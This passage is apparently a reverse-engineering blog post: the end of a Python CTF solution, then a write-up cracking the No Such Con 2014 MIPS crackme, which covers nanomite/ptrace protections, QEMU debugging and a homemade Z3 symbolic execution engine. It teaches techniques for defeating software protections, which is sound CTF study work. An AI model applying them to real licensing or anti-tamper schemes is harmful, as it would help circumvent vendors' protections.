>>> v.run_me("c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x04\x00\x00\x00d\x00\x00\x1B(\x01\x00\x00\x00N(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00rstdinrt\x01\x00\x00\x00a\x01\x00\x00\x00s\x02\x00\x00\x00\x00\x01")
>>> quarkslab
['For The New Lunar Republic']
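As a sanity check, the flag can also be recovered without the patched interpreter, since the decompiled second part only XORs a list of constants with 13. Here is a minimal sketch in plain Python; the name `decode_flag` is mine and is not part of the challenge:

```python
# Constants copied from the decompiled PART2 output above.
ENCODED = [75, 98, 127, 45, 89, 101, 104, 45, 67, 104, 122, 45, 65,
           120, 99, 108, 127, 45, 95, 104, 125, 120, 111, 97, 100, 110]

def decode_flag(values, key=13):
    """XOR every value with the key and join the resulting characters."""
    return ''.join(chr(v ^ key) for v in values)

flag = decode_flag(ENCODED)
print(flag)
```

It prints the same string the interpreter appended to the quarkslab list.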

Conclusion

This was definitely entertaining, so thanks to Serge and Quarkslab for putting this challenge together! I feel like it would have been cooler to force people to write a disassembler or/and a decompiler to study the code of run_me though ; because as I mentioned at the very beginning of the article you don't really need any tool to guess/know roughly where the flag is, and how to get it. I still did write all those little scripts because it was fun and cool that's all!

Anyway, the codes I talked about are available on my github as usual if you want to have a look at them. You can also have a look at wildfire.py if you like weird/wild/whatever Python beasts!

That's all for today guys, I hope it wasn't too long and that you did enjoy the read.

By the way, we still think it would be cool to have more people posting on that blog, so if you are interested feel free to contact us!

Taming a wild nanomite-protected MIPS binary with symbolic execution: No Such Crackme

As last year, the French conference No Such Con returns for its second edition in Paris from the 19th of November until the 21st of November. And again, the brilliant Eloi Vanderbeken & his mates at Synacktiv put together a series of three security challenges especially for this occasion. Apparently, the three tasks have already been solved by the awesome @0xfab who won the competition, hats off :).

To be honest I couldn't resist trying at least the first step, as I know that Eloi always builds really twisted and nice binaries ; so I figured I should just give it a go!

But this time we are trying something different though: this post has been co-authored by both Emilien Girault (@emiliengirault) and me. As we have slightly different solutions, we figured it would be a good idea to write those up inside a single post. This article starts with an introduction to the challenge and will then fork, presenting my solution and his.

As the article is quite long, here is the complete table of contents:

Table of contents:

REcon: Here be dragons

This part is just here to get things started: how to have a debugging environment, to know a bit more about MIPS and to know a bit more about what the binary is actually doing.

MIPS 101

The first interesting detail about this challenge is that it is a MIPS binary ; it's really kind of exotic for me. I'm mainly looking at Intel assembly, so having the opportunity to look at an unknown architecture is always appealing. You know it's like discovering a new little toy, so I just couldn't help myself & started to read the MIPS basics.

This part is going to describe only the essential information you need to both understand and crack wide open the binary ; and as I said I am not a MIPS expert, at all. From what I have seen though, this is fairly similar to what you can see on an Intel x86 CPU:

  • It is little endian (note that a big-endian version also exists but it won't be covered in this post),
  • It has way more general purpose registers,
  • The calling convention is similar to __fastcall: you pass arguments via registers, and get the return of the function in $v0,
  • Unlike x86, MIPS is RISC, so much simpler to take in hand (trust me on that one),
  • Of course, there is an IDA processor,
  • Linux and the regular tools also exist for MIPS so we will be able to use the "normal" tools we are used to,
  • It also uses a stack, much less than x86 though as most of the things happening are in registers (in the challenge at least).

Setting up a proper debugging environment

The answer to that question is Qemu, as expected. You can even download already fully prepared & working Debian images on aurel32's website.

overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2
overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta
overclok@wildout:~/chall/nsc2014$ cat start_vm.sh
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -vga none -append "root=/dev/sda1 console=tty0" -nographic
overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.2.0-4-4kc-malta ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 Debian 3.2.51-1
[...]
debian-mipsel login: root
Password:
Last login: Sat Oct 11 00:04:51 UTC 2014 on ttyS0
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@debian-mipsel:~# uname -a
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips GNU/Linux

Feel free to install your essentials in the virtual environment, some tools might come in handy (it should take a bit of time to install them though):

root@debian-mipsel:~# aptitude install strace gdb gcc python
root@debian-mipsel:~# wget https://raw.githubusercontent.com/zcutlip/gdbinit-mips/master/gdbinit-mips
root@debian-mipsel:~# mv gdbinit-mips ~/.gdbinit
root@debian-mipsel:~# gdb -q /home/user/crackmips
Reading symbols from /home/user/crackmips...(no debugging symbols found)...done.
(gdb) b *main
Breakpoint 1 at 0x402024
(gdb) r 'doar-e ftw'
Starting program: /home/user/crackmips 'doar-e ftw'
-----------------------------------------------------------------
[registers]
  V0: 7FFF6D30  V1: 77FEE000  A0: 00000002  A1: 7FFF6DF4
  A2: 7FFF6E00  A3: 0000006C  T0: 77F611E4  T1: 0FFFFFFE
  T2: 0000000A  T3: 77FF6ED0  T4: 77FE5590  T5: FFFFFFFF
  T6: F0000000  T7: 7FFF6BE8  S0: 00000000  S1: 00000000
  S2: 00000000  S3: 00000000  S4: 004FD268  S5: 004FD148
  S6: 004D0000  S7: 00000063  T8: 77FD7A5C  T9: 00402024
  GP: 77F67970  S8: 0000006C  HI: 000001A5  LO: 00005E17
  SP: 7FFF6D18  PC: 00402024  RA: 77DF2208
-----------------------------------------------------------------
[code]
=> 0x402024 <main>:     addiu   sp,sp,-72
    0x402028 <main+4>:   sw      ra,68(sp)
    0x40202c <main+8>:   sw      s8,64(sp)
    0x402030 <main+12>:  move    s8,sp
    0x402034 <main+16>:  sw      a0,72(s8)
    0x402038 <main+20>:  sw      a1,76(s8)
    0x40203c <main+24>:  lw      v1,72(s8)
    0x402040 <main+28>:  li      v0,2

And finally you should be able to run the wild beast:

root@debian-mipsel:~# /home/user/crackmips
usage: /home/user/crackmips password
root@debian-mipsel:~# /home/user/crackmips 'doar-e ftw'
WRONG PASSWORD

Brilliant :-).

The big picture

Now that we have a way of both launching and debugging the challenge, we can open the binary in IDA and start to understand what type of protection scheme is used. As always at that point, we are really not interested in details: we just want to understand how it works and what parts we will have to target to get the good boy message.

After a bit of time in IDA, here is how the binary works:

  1. It checks that the user supplied one argument: the serial
  2. It checks that the supplied serial is 48 characters long
  3. It converts the string into 6 DWORDs (/!\ pitfall warning: the conversion is a bit strange, be sure to verify your algorithm)
  4. The beast forks in two:
    1. [Father] It seems, somehow, this one is driving the son, more on that later
    2. [Son] After executing a big chunk of code that modifies (in place) the 6 original DWORDs, they get compared against the following string [ Synacktiv + NSC = <3 ]
    3. [Son] If the comparison succeeds you win, else you lose

Basically, we need to find the 6 input DWORDs that are going to generate the following ones in output: 0x7953205b, 0x6b63616e, 0x20766974, 0x534e202b, 0x203d2043, 0x5d20333c. We also know that the father is going to interact with its son, so we need to study both codes to be sure to understand the challenge properly. If you prefer code, here is the big picture in C:

int main(int argc, char *argv[])
{
    DWORD serial_dwords[6] = {0};
    if(argc != 2)
        Usage();

    // Conversion
    a2i(argv[1], serial_dwords);

    pid_t pid = fork();
    if(pid != 0)
    {
        // Father
        // a lot of stuff going on here, we will see that later on
    }
    else
    {
        // Son
        // a lot of stuff going on here, we will see that later on

        char *clear = (char*)serial_dwords;
        // 6 DWORDs = 24 bytes; memcmp returns 0 when both buffers match
        bool win = memcmp(clear, "[ Synacktiv + NSC = <3 ]", 24) == 0;
        if(win)
            GoodBoy();
        else
            BadBoy();
    }
}
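To double check that the six target DWORDs listed above really are the good boy string, I find it handy to unpack the string myself. The sketch below assumes little-endian DWORDs (the binary is mipsel); `to_dwords` is a hypothetical helper of mine, not something taken from the challenge:

```python
import struct

TARGET = b"[ Synacktiv + NSC = <3 ]"

def to_dwords(data):
    """Split a byte string into little-endian 32-bit integers."""
    assert len(data) % 4 == 0
    return list(struct.unpack('<%dI' % (len(data) // 4), data))

dwords = to_dwords(TARGET)
print(', '.join('%#010x' % d for d in dwords))
```

The string is 24 bytes long, which is exactly 6 DWORDs, and the unpacked values match the ones given in the text.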

Let's get our hands dirty

Father's in charge

The first thing I did after having the big picture was to look at the code of the father. Why? The code seemed a bit simpler than the son's one, so I figured studying the father would make more sense to understand what kind of protection we need to subvert. You can even crank up strace to have a clearer overview of the syscalls used:

root@debian-mipsel:~# strace -i /home/user/crackmips $(python -c 'print "1"*48')
[7734e224] execve("/home/user/crackmips", ["/home/user/crackmips", "11111111111111111111111111111111"...], [/* 12 vars */]) = 0
[...]
[77335e70] clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x77491068) = 2539
[77335e70] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7733557c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[...]

That's an interesting output that I didn't expect at all actually. What we are seeing here is the father driving its son by modifying, potentially (we will find that out later), its context every time the son is SIGTRAPing (note waitpid second argument).

From here, if you are quite familiar with the different existing types of software protections (I'm not saying I am an expert in this field but I just happened to know that one :-P) you can pretty much guess what that is: nanomites this is!

Nanomites 101

Nanomites are quite a nice protection. Though, it is quite a generic name ; you can really use that protection scheme in whatever way you like: your imagination is the only limit here. To be honest, this was the first time I saw this kind of protection implemented on a Unix system ; really good surprise! It usually works this way:

  1. You have two processes: a driver and a driven ; a father and a son
  2. The driver is attaching itself to the driven one with the debug APIs available on the targeted platform (ptrace here, and CreateProcess/DebugActiveProcess on Windows)
    1. Note that you won't be able to attach yourself to the son, as both Windows and Linux prevent attaching a second debugger to a process by design: some people call that part the DebugBlocker
    2. You will be able to debug the driver though
  3. Usually the interesting code is in the son, but again you can do whatever you want. Basically, you have two rules if you want an efficient protection:
    1. Make sure the driven process can't run without its driver and that they are really tied to each other
    2. The strength of the protection is that strong/intimate bond between the two processes
    3. Design your algorithm such that removing the driver is really difficult/painful/maddening for the attacker
  4. The driven process can call/notify the driver by just SIGTRAPing with an int3/break instruction for example

As I said, I see this protection scheme more like a recipe: you are free to customize it at your convenience really. If you want to read more on the subject, here is a list of links you should check out:

How the father works

Now it is time to look at the father in detail ; here is how it works:

  • The first thing it does is to waitpid until its son triggers a SIGTRAP
  • The driver retrieves the CPU context of the son process and more precisely its program counter: $pc
  • Then we have a huge block of arithmetic computations. But after spending a bit of time to study it, we can see that huge block as a black-box function that takes two parameters: the program counter of the son and some kind of counter value (as this code is going to be executed in a loop, for each SIGTRAP this variable is going to be incremented). It generates a single output which is a 32 bits value that I call the first magic value. Let's not focus on what the block is actually doing though, we will develop some tool in the next part to deal with that :-) so let's keep moving!

father_code.png
  • This magic value is then used to find a specific entry in an array of QWORDs (606 QWORDs which is 6 times the number of break instructions in the son -- you will understand that a bit later don't worry). Basically, the code is going to loop over every single QWORD of this array until finding one whose high DWORD equals the magic value. From there you get another magic value which is the low DWORD of the matching QWORD.
  • Another huge block of arithmetic computations is used. Similarly to the first one, we can see it as a black-box function with two inputs: the second magic value and a round index (the son is executing its code 6 times, so this round index will go from 0 to 5 -- again this will be a bit clearer when we look at the son, so just keep this detail in your mind). The output of this function is a 32-bit value. Again, do not study this block, we don't need it.
  • The generated value is in fact a valid code address inside the son ; so straight after the computation, the father is going to modify the program counter in the previously retrieved CPU context. Once this is done, it calls ptrace with SETREGS to set the new CPU context of the son.

This is roughly what is going to be executed every time the son hits a break instruction ; the father is definitely driving the son. And we can feel it now, the son is going to jump (via its father) through blocks of code that aren't (necessarily) contiguous in memory, so studying the son code as it is in IDA is quite pointless as those basic blocks aren't going to be executed in this order.
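To make the father's loop a bit more concrete, here is a rough model of one iteration in Python. Everything in it is a stand-in: the two arithmetic blocks are passed in as opaque callables (`f_magic`, `f_target`), and the toy table and toy functions are made up for illustration, they are not the real data or formulas from the binary. Only the QWORD lookup (match on the high DWORD, return the low DWORD) follows the description above.

```python
def find_second_magic(table, first_magic):
    """Scan the QWORD table for an entry whose high DWORD equals first_magic
    and return its low DWORD, mirroring the father's lookup loop."""
    for qword in table:
        if ((qword >> 32) & 0xffffffff) == first_magic:
            return qword & 0xffffffff
    raise LookupError('no entry for magic %#x' % first_magic)

def next_pc(pc_son, n_break, round_index, table, f_magic, f_target):
    """One iteration of the father's loop, with both arithmetic blocks
    supplied as opaque callables (placeholders, not the real formulas)."""
    first_magic = f_magic(pc_son, n_break) & 0xffffffff
    second_magic = find_second_magic(table, first_magic)
    return f_target(second_magic, round_index) & 0xffffffff

# Toy stand-ins for the two black boxes and a made-up two-entry table.
toy_f_magic = lambda pc, n: pc ^ n
toy_f_target = lambda magic, rnd: magic + 4 * rnd
toy_table = [0x1111111100400100, 0x0040100100400200]

print(hex(next_pc(0x401000, 1, 2, toy_table, toy_f_magic, toy_f_target)))
```

In the real challenge the returned value would be written into the son's saved program counter before calling ptrace with SETREGS.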

Long story short, the nanomites are used as some kind of runtime code flow scrambling primitive, isn't it exciting? Told you that @elvanderb is crazy :-).

Gearing up: Writing a symbolic execution engine

At that point, I can assure you that we need some tooling: we have studied the binary, we know how the main parts work and we just need to extract the different equations/formulas used by both the computation of the son's program counter and the serial verification algorithm. Basically the engine is going to be useful to study both the father and the son.

If you are not really familiar with symbolic execution, I recommend you take a little bit of time to read Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution and check out z3-playground if you are not really familiar with Z3 and its Python bindings.

This time I decided to not build that engine as an IDA Python script, but just to do everything myself. Do not be afraid though, even if it sounds scary it is really not: the challenge is a perfect environment for this kind of thing. It doesn't use a lot of instructions, we don't need to support branches and nearly only arithmetic instructions are used.

I also chose to implement this engine in a way that we can also use it as a simple emulator. You can even use it as a decompiler if you want! The two other interesting points for us are:

  1. Once we run a piece of code in the symbolic engine, we will extract certain computations / formulas. Thanks to Microsoft's Z3 we will be able to retrieve input values that will generate specific output values: this is basically what you gain by using a solver and symbolic variables.
  2. But the other interesting point is that you still can use the extracted Z3 expressions as some kind of black-box functions. You know what the function is doing, kind of, but you don't know how ; and you are not interested in the how. You know the inputs, and the outputs. To obtain a concrete output value, you can just replace the symbolic variables by concrete values. This is really handy, especially when you are not only interested in finding input values to generate specific output values ; sometimes you just want to go both ways :-).

Anyway, after this long theoretical speech let's have a look at some code. The first important job of the engine is to be able to parse MIPS assembly: fortunately for us this is really easy. We are directly feeding plain-text MIPS disassembly directly copied from IDA to our engine:

def _parse_line(self, line):
  addr_seg, instr, rest = line.split(None, 2)
  args = rest.split(',')
  for i in range(len(args)):
    if '#' in args[i]:
        args[i], _ = args[i].split(None, 1)

  a0, a1, a2 = map(
    lambda x: x.strip().replace('$', '') if x is not None else x,
    args + [None]*(3 - len(args))
  )
  _, addr = addr_seg.split(':')
  return int(addr, 16), instr, a0, a1, a2
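If you want to play with the parser outside of the engine class, here is a standalone Python 3 port. It is a sketch that only handles lines shaped like the ones in this post (a segment:address prefix, a mnemonic, comma-separated operands and an optional `#` comment); unlike the method above it cuts the comment at the `#` character, which is my own simplification.

```python
def parse_line(line):
    """Standalone port of _parse_line: split one line of IDA text disassembly
    into (address, mnemonic, operand0, operand1, operand2)."""
    addr_seg, instr, rest = line.split(None, 2)
    args = rest.split(',')
    for i, arg in enumerate(args):
        if '#' in arg:
            # Drop the trailing IDA comment from the operand.
            args[i] = arg.split('#', 1)[0]
    # Strip whitespace and the '$' register prefix, then pad to 3 operands.
    args = [a.strip().replace('$', '') for a in args]
    args += [None] * (3 - len(args))
    _, addr = addr_seg.split(':')
    return (int(addr, 16), instr) + tuple(args)

print(parse_line('.doare:DEADBEEF                 lw      $v0, 0x318+var($fp)  # Load Word'))
```

Missing operands come back as None, exactly like in the method.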

From here you have all the information you need: the instruction and its operands (None if an operand doesn't exist as you can have up to 3 operands). The other important job that follows is to handle the different types of operands ; here are the ones I encountered in the challenge:

  • General purpose register,
  • Stack-variable,
  • Immediate value.

To handle / convert those I created a bunch of dull / helper functions:

def _is_gpr(self, x):
  '''Is it a valid GPR name?'''
  return x in self.gpr

def _is_imm(self, x):
  '''Is it a valid immediate?'''
  x = x.replace('loc_', '0x')
  try:
    int(x, 0)
    return True
  except:
    return False

def _to_imm(self, x):
  '''Get an integer from a string immediate'''
  if self._is_imm(x):
    x = x.replace('loc_', '0x')
    return int(x, 0)
  return None

def _is_memderef(self, x):
  '''Is it a memory dereference?'''
  return '(' in x and ')' in x

def is_stackvar(self, x):
  '''Is it a stack variable?'''
  return ('(fp)' in x and '+' in x) or ('var_' in x and '+' in x)

def to_stackvar(self, x):
  '''Get the stack variable name'''
  _, var_name = x.split('+')
  return var_name.replace('(fp)', '')
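One detail that is easy to miss with these helpers is that the order of the checks matters: a stack variable such as `0x318+var(fp)` also contains parentheses, so it has to be tested before the generic memory dereference. The sketch below folds the helpers into a single hypothetical `classify` function to show that; the `GPRS` set is a shortened, illustrative list of register names, not the engine's full table.

```python
# Shortened, illustrative register list (the real engine knows all of them).
GPRS = {'zero', 'at', 'v0', 'v1', 'a0', 'a1', 'a2', 'a3', 'fp', 'sp', 'ra'}

def classify(operand):
    """Return 'stackvar', 'memderef', 'gpr', 'imm' or 'unknown'
    for an operand already stripped of its '$' prefix."""
    # Stack variables must be tested first: they also contain parentheses.
    if ('(fp)' in operand or 'var_' in operand) and '+' in operand:
        return 'stackvar'
    if '(' in operand and ')' in operand:
        return 'memderef'
    if operand in GPRS:
        return 'gpr'
    try:
        # IDA labels such as loc_400A78 are treated as hexadecimal immediates.
        int(operand.replace('loc_', '0x'), 0)
        return 'imm'
    except ValueError:
        return 'unknown'

for op in ('0x318+var(fp)', '8(sp)', 'v0', '0x446F8657', 'loc_400A78'):
    print(op, '->', classify(op))
```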

Finally, we have to handle every different instruction and its encodings. Of course, you need to implement only the instructions you want: most likely the ones that are used in the code you are interested in. In a nutshell, this is the core of the engine. You can also use it to output valid Python/C lines if you fancy having a decompiler up your sleeve ; might be handy right?

This is what the core function looks like, it is really simple, dumb and so unoptimized ; but at least it's clear to me:

def step(self):
  '''This is the core of the engine -- you are supposed to implement the semantics
  of all the instructions you want to emulate here.'''
  line = self.code[self.pc]
  addr, instr, a0, a1, a2 = self._parse_line(line)
  if instr == 'sw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      self.logger.info('%s = $%s', var_name, a0)
      self.stack[var_name] = self.gpr[a0]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      self.logger.info('[%s + %s] = $%s', base, idx, a0)
      self.mem[computed_address] = self.gpr[a0]
    else:
      raise Exception('sw not implemented')
  elif instr == 'lw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      if var_name not in self.stack:
        self.logger.info(' WARNING: Assuming %s was 0', var_name)
        self.stack[var_name] = 0
      self.logger.info('$%s = %s', a0, var_name)
      self.gpr[a0] = self.stack[var_name]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      if computed_address not in self.mem:
        value = raw_input(' WARNING %.8x is not in your memory store -- what value is there @0x%.8x?' % (computed_address, computed_address))
      else:
        value = self.mem[computed_address]
      self.logger.info('$%s = [%s+%s]', a0, idx, base)
      self.gpr[a0] = value
    else:
      raise Exception('lw not implemented')
[...]

The first level of if handles the different instructions, the second level of if handles the different encodings an instruction can have. The self.logger thingy is just my way to save the execution traces in files to keep the console clean:

def __init__(self, trace_name):
  self.gpr = {
    'zero' : 0,
    'at' : 0,
    'v0' : 0,
    'v1' : 0,
# [...]
    'lo' : 0,
    'hi' : 0
  }

  self.stack = {}
  self.pc = 0
  self.code = []
  self.mem = {}
  self.stack_offsets = {}
  self.debug = False
  self.enable_z3 = False

  if not os.path.exists('traces'):
      os.mkdir('traces')

  self.logger = logging.getLogger(trace_name)
  h = logging.FileHandler(
      os.path.join('traces', trace_name),
      mode = 'w'
  )

  h.setFormatter(
      logging.Formatter(
          '%(levelname)s: %(asctime)s %(funcName)s @ l%(lineno)d -- %(message)s',
          datefmt = '%Y-%m-%d %H:%M:%S'
      )
  )

  self.logger.setLevel(logging.INFO)
  self.logger.addHandler(h)

At that point, if I wanted only an emulator I would be done. But because I want to use Z3 and symbolic variables I want to draw your attention to two common pitfalls that can cost you hours of debugging (trust me on that one :-():

  • The first one is that the operator __rshift__ isn't the logical right shift but the arithmetical one; which is quite different and can generate results you don't expect:
In [1]: from z3 import *

In [2]: simplify(BitVecVal(4, 3) >> 1)
Out[2]: 6

In [3]: simplify(LShR(BitVecVal(4, 3), 1))
Out[3]: 2

In [4]: 4 >> 1
Out[4]: 2

To work around that I usually define my own _LShR function that does whatever is correct according to the operand types (yes we could also replace z3.BitVecNumRef.__rshift__ by LShR directly):

def _LShR(self, a, b):
  '''Useful hook function if you want to run the emulation
  with/without Z3 as LShR is different from >> in Z3'''
  if self.enable_z3:
    if isinstance(a, long) or isinstance(a, int):
      a = BitVecVal(a, 32)
    if isinstance(b, long) or isinstance(b, int):
      b = BitVecVal(b, 32)
    return LShR(a, b)
  return a >> b
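If the 6 versus 2 result above looks odd, it may help to reproduce both shifts on fixed-width values with plain Python integers, no Z3 involved. This is only an illustration of the semantics; the helper names `lshr` and `ashr` are mine.

```python
def lshr(value, shift, bits):
    """Logical right shift: vacated high bits are filled with zeros."""
    mask = (1 << bits) - 1
    return (value & mask) >> shift

def ashr(value, shift, bits):
    """Arithmetic right shift: vacated high bits copy the sign bit."""
    mask = (1 << bits) - 1
    value &= mask
    if value >> (bits - 1):          # sign bit set: reinterpret as negative
        value -= 1 << bits
    return (value >> shift) & mask   # Python's >> on ints is arithmetic

print(ashr(4, 1, 3), lshr(4, 1, 3))
```

On 3 bits, 4 is 0b100, which is -4 once the top bit is read as a sign bit; shifting it arithmetically gives -2, which is 0b110 = 6, whereas the logical shift gives 0b010 = 2.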
  • The other interesting detail to keep in mind is that you can't have any overflow on BitVecs of the same size ; the result is automatically truncated. So if you happen to have mathematical operations that need to overflow, like a multiplication (this is used in the challenge), you should store the temporary result in a bigger temporary variable. In my case, I was supposed to store the overflow inside another register, $hi which is used to store the high DWORD part of the result. But because I wasn't storing the result in a bigger BitVec, $hi ended up always equal to zero which is quite a nice problem when you have to pinpoint this issue in thousands of lines of assembly :-).
elif instr == 'multu':
  if self._is_gpr(a0) and self._is_gpr(a1) and a2 is None:
    self.logger.info('$lo = ($%s * $%s) & 0xffffffff', a0, a1)
    self.logger.info('$hi = ($%s * $%s) >> 32', a0, a1)
    if self.enable_z3:
      a0bis, a1bis = self.gpr[a0], self.gpr[a1]
      if isinstance(a0bis, int) or isinstance(a0bis, long):
        a0bis = BitVecVal(a0bis, 32)
      if isinstance(a1bis, int) or isinstance(a1bis, long):
        a1bis = BitVecVal(a1bis, 32)

      a064 = ZeroExt(32, a0bis)
      a164 = ZeroExt(32, a1bis)
      r = a064 * a164
      self.gpr['lo'] = Extract(31, 0, r)
      self.gpr['hi'] = Extract(63, 32, r)
    else:
      x = self.gpr[a0] * self.gpr[a1]
      self.gpr['lo'] = x & 0xffffffff
      self.gpr['hi'] = self._LShR(x, 32)
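The truncation pitfall is easy to reproduce with plain integers. The sketch below contrasts a proper 64-bit product with one that has been cut down to 32 bits before extracting the high half, which is my approximation of what happens when two 32-bit BitVecs are multiplied directly. Both function names are hypothetical.

```python
MASK32 = 0xffffffff

def multu(a, b):
    """Unsigned 32x32 -> 64-bit multiply, returning (hi, lo) like MIPS multu."""
    product = (a & MASK32) * (b & MASK32)   # full 64-bit product
    return (product >> 32) & MASK32, product & MASK32

def multu_truncated(a, b):
    """What a 32-bit-wide multiplication yields: the high half is lost."""
    product = ((a & MASK32) * (b & MASK32)) & MASK32  # truncated to 32 bits
    return product >> 32, product

print(multu(0x80000000, 4), multu_truncated(0x80000000, 4))
```

With the truncated version the high half is always zero, which is exactly the symptom described above.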

I think this is it really, you can now impress girls with your brand new shiny toy, check this out:

def main(argc, argv):
    print '=' * 50
    sym = MiniMipsSymExecEngine('donotcare.log')
    # DO NOT FORGET TO ENABLE Z3 :)
    sym.enable_z3 = True
    a = BitVec('a', 32)
    sym.stack['var'] = a
    sym.stack['var2'] = 0xdeadbeef
    sym.stack['var3'] = 0x31337
    sym.code = '''.doare:DEADBEEF                 lw      $v0, 0x318+var($fp)  # Load Word
.doare:DEADBEEF                 lw      $v1, 0x318+var2($fp)  # Load Word
.doare:DEADBEEF                 subu    $v0, $v1, $v0    #
.doare:DEADBEEF                 li      $v1, 0x446F8657  # Load Immediate
.doare:DEADBEEF                 multu   $v0, $v1         # Multiply Unsigned
.doare:DEADBEEF                 mfhi    $v1              # Move From HI
.doare:DEADBEEF                 subu    $v0, $v1         # Subtract Unsigned'''.split('\n')
    sym.run()

    print 'Symbolic mode:'
    print 'Resulting equation: %r' % sym.gpr['v0']
    print 'Resulting value if `a` is 0xdeadb44: %#.8x' % substitute(
        sym.gpr['v0'], (a, BitVecVal(0xdeadb44, 32))
    ).as_long()

    print '=' * 50
    emu = MiniMipsSymExecEngine('donotcare.log')
    emu.stack = sym.stack
    emu.stack['var'] = 0xdeadb44
    emu.stack['var2'] = 0xdeadbeef
    emu.stack['var3'] = 0x31337
    emu.code = sym.code
    emu.run()

    print 'Emulator mode:'
    print 'Resulting value when `a` is 0xdeadb44: %#.8x' % emu.gpr['v0']
    print '=' * 50
    return 1

Which results in:

PS D:\Codes\NoSuchCon2014> python .\mini_mips_symexec_engine.py
==================================================
Symbolic mode:
Resulting equation: 3735928559 +
4294967295*a +
4294967295*
Extract(63,
        32,
        1148159575*Concat(0, 3735928559 + 4294967295*a))
Resulting value if `a` is 0xdeadb44: 0x98f42d24
==================================================
Emulator mode:
Resulting value when `a` is 0xdeadb44: 0x98f42d24
==================================================
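If you don't have the engine at hand, the concrete result can be cross-checked by replaying the seven demo instructions by hand on 32-bit values. This is just a hand-written transcription of the listing (the function name `demo` is mine), not output from the engine:

```python
MASK32 = 0xffffffff

def demo(a, var2=0xdeadbeef):
    """Replay the seven demo instructions on concrete 32-bit values."""
    v0 = a                      # lw    $v0, var
    v1 = var2                   # lw    $v1, var2
    v0 = (v1 - v0) & MASK32     # subu  $v0, $v1, $v0
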